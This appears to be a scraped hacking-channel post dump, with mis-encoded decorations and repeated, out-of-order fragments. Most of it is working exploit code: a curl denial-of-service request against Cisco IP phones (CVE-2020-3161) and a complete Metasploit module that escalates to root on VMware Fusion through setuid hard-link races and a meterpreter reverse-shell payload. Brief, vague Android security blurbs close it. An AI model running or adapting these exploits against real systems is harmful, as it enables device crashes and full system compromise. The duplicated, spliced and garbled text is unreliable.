β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦# Exploit Title: Cisco IP Phone 11.7 TESTED BY UNDERCODE βΌοΈ
- Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24
curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦# Exploit Title: Cisco IP Phone 11.7 TESTED BY UNDERCODE βΌοΈ
- Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24
curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Cisco
AI Infrastructure, Secure Networking, and Software Solutions
Cisco is a worldwide technology leader powering an inclusive future for all. Learn more about our products, services, solutions, and innovations.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦VMWARE 2020 EXPLOIT TESTED BY UNDERCODE :
AVAIBLE AT DEEPWEB & EXPLOITE DB :
π¦ ππΌππ πππΈβπ :
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::OSX::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
'Description' => %q(
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
The Open VMware USB Arbitrator Service can be launched outide of its standard path
which allows loading of an attacker controlled binary. By creating a payload in the
user home directory in a specific folder, and creating a hard link to the 'Open VMware
USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
with an effective UID of 0.
discovered an incomplete patch in 11.5.3 with a TOCTOU race.
Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
),
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Dhanesh Kizhakkinan', # discovery
'Rich Mirch', # edb module
'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
'grimm'
],
'Platform' => [ 'osx' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'CVE', '2020-3950' ],
[ 'EDB', '48235' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
[ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
[ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
],
'DisclosureDate' => 'Mar 17 2020',
'DefaultOptions' =>
{
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
'WfsDelay' => 15
}
)
)
register_options [
OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end
def open_usb_service
'Open VMware USB Arbitrator Service'
end
def usb_service
'VMware USB Arbitrator Service'
end
def get_home_dir
home = cmd_exec 'echo ~'
if home.blank?
fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
end
home
end
def content_dir
"#{get_home_dir}/Contents"
end
def base_dir
"#{content_dir}/Library/services/"
end
def kill_process(executable)
pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
cmd_exec pid_kill
end
def get_version
# Thanks to @ddouhine on github for this answer!
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
/=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
if version_raw.blank?
fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
end
Gem::Version.new(version)
end
π¦VMWARE 2020 EXPLOIT TESTED BY UNDERCODE :
AVAIBLE AT DEEPWEB & EXPLOITE DB :
π¦ ππΌππ πππΈβπ :
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::OSX::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
'Description' => %q(
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
The Open VMware USB Arbitrator Service can be launched outide of its standard path
which allows loading of an attacker controlled binary. By creating a payload in the
user home directory in a specific folder, and creating a hard link to the 'Open VMware
USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
with an effective UID of 0.
discovered an incomplete patch in 11.5.3 with a TOCTOU race.
Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
),
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Dhanesh Kizhakkinan', # discovery
'Rich Mirch', # edb module
'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
'grimm'
],
'Platform' => [ 'osx' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'CVE', '2020-3950' ],
[ 'EDB', '48235' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
[ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
[ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
],
'DisclosureDate' => 'Mar 17 2020',
'DefaultOptions' =>
{
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
'WfsDelay' => 15
}
)
)
register_options [
OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end
def open_usb_service
'Open VMware USB Arbitrator Service'
end
def usb_service
'VMware USB Arbitrator Service'
end
def get_home_dir
home = cmd_exec 'echo ~'
if home.blank?
fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
end
home
end
def content_dir
"#{get_home_dir}/Contents"
end
def base_dir
"#{content_dir}/Library/services/"
end
def kill_process(executable)
pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
cmd_exec pid_kill
end
def get_version
# Thanks to @ddouhine on github for this answer!
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
/=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
if version_raw.blank?
fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
end
Gem::Version.new(version)
end
Metasploit
Download Metasploit: World's Most Used Penetration Testing Tool | Metasploit
Pen testing software to act like an attacker. Download Metasploit to safely simulate attacks on your network and uncover weaknesses. Free download.
def pre_11_5_3
# Upload payload executable & chmod
payload_filename = "#{base_dir}#{usb_service}"
print_status "Uploading Payload: #{payload_filename}"
write_file payload_filename, generate_payload_exe
chmod payload_filename, 0o755
register_file_for_cleanup payload_filename
# create folder structure and hard link to the original binary
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
print_status "Created folder (#{link_folder}) and link"
print_status 'Starting USB Service (5 sec pause)'
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
Rex.sleep 5 # give time for the service to execute our payload
print_status 'Killing service'
cmd_exec "pkill '#{open_usb_service}'"
print_status "Deleting #{root_link_folder}"
rm_rf root_link_folder
end
def exactly_11_5_3
# Upload payload executable & chmod
payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
print_status "Uploading Payload to #{payload_name}"
write_file payload_name, generate_payload_exe
chmod payload_name, 0o755
#create race with codesign check
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
print_status 'Uploading race condition executable.'
race = <<~EOF
#!/bin/sh
while [ "1" = "1" ]; do
ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
done
EOF
racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx racer_name, race
register_file_for_cleanup racer_name
register_dirs_for_cleanup root_link_folder
# create the hard link
print_status "Creating folder (#{link_folder}) and link"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
# create the launcher to start the racer and keep launching our service to attempt to win
launcher = <<~EOF
#!/bin/sh
#{racer_name} &
for i in {1..#{datastore['MAXATTEMPTS']}}
do
echo "attempt $i";
'#{link_folder}#{open_usb_service}'
done
EOF
runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx runner_name, launcher
register_file_for_cleanup runner_name
print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
results = cmd_exec "#{runner_name} & :"
Rex.sleep 15 # give time for the service to execute our payload
vprint_status results
print_status 'Exploit Finished, killing scripts.'
kill_process racer_name
kill_process runner_name # in theory should be killed already but just in case
kill_process "'#{link_folder}#{open_usb_service}'"
# kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
# above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
# rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
end
# Upload payload executable & chmod
payload_filename = "#{base_dir}#{usb_service}"
print_status "Uploading Payload: #{payload_filename}"
write_file payload_filename, generate_payload_exe
chmod payload_filename, 0o755
register_file_for_cleanup payload_filename
# create folder structure and hard link to the original binary
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
print_status "Created folder (#{link_folder}) and link"
print_status 'Starting USB Service (5 sec pause)'
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
Rex.sleep 5 # give time for the service to execute our payload
print_status 'Killing service'
cmd_exec "pkill '#{open_usb_service}'"
print_status "Deleting #{root_link_folder}"
rm_rf root_link_folder
end
def exactly_11_5_3
# Upload payload executable & chmod
payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
print_status "Uploading Payload to #{payload_name}"
write_file payload_name, generate_payload_exe
chmod payload_name, 0o755
#create race with codesign check
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
print_status 'Uploading race condition executable.'
race = <<~EOF
#!/bin/sh
while [ "1" = "1" ]; do
ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
done
EOF
racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx racer_name, race
register_file_for_cleanup racer_name
register_dirs_for_cleanup root_link_folder
# create the hard link
print_status "Creating folder (#{link_folder}) and link"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
# create the launcher to start the racer and keep launching our service to attempt to win
launcher = <<~EOF
#!/bin/sh
#{racer_name} &
for i in {1..#{datastore['MAXATTEMPTS']}}
do
echo "attempt $i";
'#{link_folder}#{open_usb_service}'
done
EOF
runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx runner_name, launcher
register_file_for_cleanup runner_name
print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
results = cmd_exec "#{runner_name} & :"
Rex.sleep 15 # give time for the service to execute our payload
vprint_status results
print_status 'Exploit Finished, killing scripts.'
kill_process racer_name
kill_process runner_name # in theory should be killed already but just in case
kill_process "'#{link_folder}#{open_usb_service}'"
# kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
# above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
# rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
end
def check
unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
print_bad "'#{open_usb_service}' binary missing"
return CheckCode::Safe
end
version = get_version
if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
vprint_good "Vmware Fusion #{version} is exploitable"
else
print_bad "VMware Fusion #{version} is NOT exploitable"
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
# First check the system is vulnerable, or the user wants to run regardless
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
# Check if we're already root
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
end
# Make sure we can write our payload to the remote system
rm_rf content_dir # live dangerously.
if directory? content_dir
fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
end
cmd_exec "mkdir -p #{base_dir}"
register_dirs_for_cleanup content_dir
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable."
end
version = get_version
if version == Gem::Version.new('11.5.3')
vprint_status 'Using 11.5.3 exploit'
exactly_11_5_3
elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
vprint_status 'Using pre-11.5.3 exploit'
pre_11_5_3
end
rm_rf content_dir # live dangerously.
end
end
π¦TESTED BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
print_bad "'#{open_usb_service}' binary missing"
return CheckCode::Safe
end
version = get_version
if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
vprint_good "Vmware Fusion #{version} is exploitable"
else
print_bad "VMware Fusion #{version} is NOT exploitable"
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
# First check the system is vulnerable, or the user wants to run regardless
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
# Check if we're already root
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
end
# Make sure we can write our payload to the remote system
rm_rf content_dir # live dangerously.
if directory? content_dir
fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
end
cmd_exec "mkdir -p #{base_dir}"
register_dirs_for_cleanup content_dir
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable."
end
version = get_version
if version == Gem::Version.new('11.5.3')
vprint_status 'Using 11.5.3 exploit'
exactly_11_5_3
elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
vprint_status 'Using pre-11.5.3 exploit'
pre_11_5_3
end
rm_rf content_dir # live dangerously.
end
end
π¦TESTED BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Android Popular surface adjustments or hacks :
instagram.com/undercodeTesting
> developers use several popular applications to hack Android devices to make them faster, extend battery life, and customize screen savers, ringtones, alerts, and more.
> The list of hackers that can be used to improve Android is large and growing every day. Depending on what the hacker can do, the adjustment or hacking can be superficial or the type of hacking system.
π¦ Popular surface adjustments or hacks are:
1) Tusker-for location-based automation
Ability to install custom keyboards such as Swype and SwiftKey
2) Deep system adjustments include downloading new cores and radios to increase speed and battery life
Unfortunately, there are many hackers with malicious intent that can and do invade Android devices to steal valuable personal information or profit from illegal financial transactions.
> Although it may be difficult (or even impossible) to make your Android unattackable, you can take some measures to improve the security of your device.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Android Popular surface adjustments or hacks :
instagram.com/undercodeTesting
> developers use several popular applications to hack Android devices to make them faster, extend battery life, and customize screen savers, ringtones, alerts, and more.
> The list of hackers that can be used to improve Android is large and growing every day. Depending on what the hacker can do, the adjustment or hacking can be superficial or the type of hacking system.
π¦ Popular surface adjustments or hacks are:
1) Tusker-for location-based automation
Ability to install custom keyboards such as Swype and SwiftKey
2) Deep system adjustments include downloading new cores and radios to increase speed and battery life
Unfortunately, there are many hackers with malicious intent that can and do invade Android devices to steal valuable personal information or profit from illegal financial transactions.
> Although it may be difficult (or even impossible) to make your Android unattackable, you can take some measures to improve the security of your device.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Three major hacking threats to Android by undercode :
1) Data in transit: Android devices and mobile devices are often particularly vulnerable because they only use wireless communication and often use public WiFi, which may be unsafe. The attack often used by hackers is a man-in-the-middle attack.
> The attacker breaks into the device and redirects the data to use the resources on it, and then forwards it to the original target. This method allows hackers to monitor Internet browsing activity, steal keystrokes to identify passwords and isolate individuals' physical locations, and possibly listen to calls and block text.
2) Third-party apps: In a recent study, 57% of malicious apps in the Android market were found in third-party app stores.
3) SMS Trojan Horse: By including advanced dialing features in the Trojan Horse application, an attacker can run the victim's phone bill and have the mobile operator collect and distribute funds to them. Another malicious use of SMS involves using an infected device to send SMS text messages to all contacts in the address book, which contains links that trick the recipient to download and install the worm, infecting many devices at once.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
